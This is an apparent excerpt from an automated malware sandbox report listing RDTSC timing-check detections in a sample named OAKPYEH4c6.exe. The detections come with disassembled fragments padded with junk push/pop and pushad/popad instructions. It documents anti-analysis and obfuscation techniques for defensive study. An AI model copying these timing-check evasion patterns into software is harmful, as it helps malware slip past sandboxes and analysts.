Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1796853 second address: 1796879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3398F1B598h 0x0000000d jnl 00007F3398F1B586h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1796879 second address: 179687D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179687D second address: 1796883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179ED03 second address: 179ED07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179ED07 second address: 179ED19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3398F1B58Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 172F24B second address: 172F251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 172F251 second address: 172F268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B593h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179F3BC second address: 179F3DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F33985001D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e je 00007F33985001D8h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F33985001D6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179F3DA second address: 179F44A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B593h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F3398F1B592h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F3398F1B599h 0x0000001b jmp 00007F3398F1B598h 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 jg 00007F3398F1B58Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179F584 second address: 179F58E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33985001DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179F58E second address: 179F59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F3398F1B594h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A22B1 second address: 17A22B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A22B7 second address: 17A22FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3398F1B597h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3398F1B596h 0x00000011 jmp 00007F3398F1B594h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A22FF second address: 17A233F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F33985001DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F33985001E3h 0x00000014 jmp 00007F33985001E7h 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A233F second address: 17A2351 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jng 00007F3398F1B58Eh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17326F8 second address: 173271E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F33985001E7h 0x0000000e jnc 00007F33985001D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A4E9A second address: 17A4EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A4EA1 second address: 17A4EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F33985001E6h 0x0000000f js 00007F33985001DEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A4EDA second address: 17A4EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A4EE4 second address: 17A4EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A4EFD second address: 17A4F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 171CA67 second address: 171CA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F33985001E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 171CA80 second address: 171CABA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jmp 00007F3398F1B58Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3398F1B597h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17AA3E5 second address: 17AA3EF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F33985001D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17200AA second address: 17200AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A9089 second address: 17A90A2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33985001E4h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A9E06 second address: 17A9E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A9E0A second address: 17A9E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A9F53 second address: 17A9F93 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3398F1B58Fh 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F3398F1B58Ch 0x00000019 pop edx 0x0000001a pushad 0x0000001b jmp 00007F3398F1B592h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A9F93 second address: 17A9F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17A9F99 second address: 17A9FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B26F9 second address: 17B2708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001DAh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B2887 second address: 17B28C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F3398F1B586h 0x00000010 jmp 00007F3398F1B599h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B28C4 second address: 17B28CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33985001DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B2C6E second address: 17B2C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B2F8B second address: 17B2F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B2F9A second address: 17B2FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3398F1B58Ch 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1734274 second address: 173427A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B9DCA second address: 17B9DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jng 00007F3398F1B5BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F3398F1B586h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B9DE0 second address: 17B9DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B9DE4 second address: 17B9E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F3398F1B586h 0x00000011 jp 00007F3398F1B586h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B8B4A second address: 17B8B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001DCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B8B61 second address: 17B8B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B592h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B8CA3 second address: 17B8CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B8CA9 second address: 17B8CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B8CB1 second address: 17B8CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B8CCB second address: 17B8CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B598h 0x00000007 jmp 00007F3398F1B58Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B91E1 second address: 17B91E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B91E5 second address: 17B91E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B91E9 second address: 17B91F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B94F7 second address: 17B94FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B94FB second address: 17B9503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B9665 second address: 17B96D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B590h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3398F1B58Eh 0x0000000f jnp 00007F3398F1B586h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pushad 0x0000001a jmp 00007F3398F1B58Ah 0x0000001f jmp 00007F3398F1B590h 0x00000024 jmp 00007F3398F1B598h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c jne 00007F3398F1B586h 0x00000032 ja 00007F3398F1B586h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B9836 second address: 17B9856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F33985001E3h 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17B9B3D second address: 17B9B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F3398F1B586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jg 00007F3398F1B5A2h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BD627 second address: 17BD635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007F33985001D6h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BD635 second address: 17BD63B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BD63B second address: 17BD63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176B0C1 second address: 1754407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3398F1B58Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add edx, dword ptr [ebp+122D1863h] 0x00000014 call dword ptr [ebp+122D3561h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176B748 second address: 176B74E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176B74E second address: 176B76E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b je 00007F3398F1B588h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176B8D8 second address: 176B8DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C2B2 second address: 176C2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C2B8 second address: 176C2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C2BC second address: 176C2C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C330 second address: 176C336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C424 second address: 176C429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C429 second address: 176C43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F33985001D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176C43A second address: 17550A9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F3398F1B588h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub cl, 00000000h 0x00000029 call dword ptr [ebp+122D1A94h] 0x0000002f push ebx 0x00000030 jng 00007F3398F1B58Ch 0x00000036 jmp 00007F3398F1B590h 0x0000003b pop ebx 0x0000003c pushad 0x0000003d pushad 0x0000003e push esi 0x0000003f pop esi 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BDC63 second address: 17BDC6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BDC6A second address: 17BDC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F3398F1B590h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jc 00007F3398F1B586h 0x00000015 jo 00007F3398F1B586h 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BDC91 second address: 17BDC9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F33985001D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BDDEF second address: 17BDDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE10E second address: 17BE128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F33985001DDh 0x0000000a jl 00007F33985001DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE28F second address: 17BE294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE3D0 second address: 17BE3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F33985001D6h 0x0000000a jmp 00007F33985001E3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE3ED second address: 17BE40D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F3398F1B586h 0x0000000e jmp 00007F3398F1B592h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE40D second address: 17BE432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F33985001F4h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F33985001D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE432 second address: 17BE436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17BE436 second address: 17BE43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C5717 second address: 17C5722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C5722 second address: 17C573F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33985001E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C573F second address: 17C5749 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3398F1B586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C5749 second address: 17C5755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C5755 second address: 17C5783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B58Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F3398F1B58Ch 0x00000015 push eax 0x00000016 jg 00007F3398F1B586h 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C58E9 second address: 17C58FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001E2h 0x00000009 rdtsc
